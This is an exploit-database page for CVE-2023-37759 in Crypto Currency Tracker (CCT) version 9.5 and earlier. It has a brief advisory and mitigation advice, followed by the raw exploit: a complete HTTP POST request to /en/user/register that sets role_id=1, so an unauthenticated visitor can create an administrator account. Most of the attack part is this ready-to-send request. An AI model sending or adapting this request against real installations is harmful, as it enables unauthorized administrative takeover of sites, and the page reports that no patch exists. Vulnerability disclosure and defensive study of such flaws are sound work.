header-logo
Suggest Exploit
vendor:
Crypto Currency Tracker (CCT)
by:
0xBr
8.1
CVSS
CRITICAL
Admin Account Creation
CWE
Product Name: Crypto Currency Tracker (CCT)
Affected Version From: <=9.5
Affected Version To:
Patch Exists: NO
Related CWE: CVE-2023-37759
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2023

Crypto Currency Tracker (CCT) 9.5 – Admin Account Creation (Unauthenticated)

The Crypto Currency Tracker (CCT) version 9.5 allows unauthenticated users to create an admin account by sending a specially crafted POST request to the /en/user/register endpoint. This vulnerability can be exploited by an attacker to gain unauthorized administrative access to the application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software that fixes the issue. Additionally, access to the /en/user/register endpoint should be restricted to authorized users only.
Source

Exploit-DB raw data:

# Exploit Title: Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)
# Date: 11.08.2023
# Exploit Author: 0xBr
# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008
# Version: <=9.5
# CVE: CVE-2023-37759

POST /en/user/register HTTP/2
Host: localhost
Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 756

_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register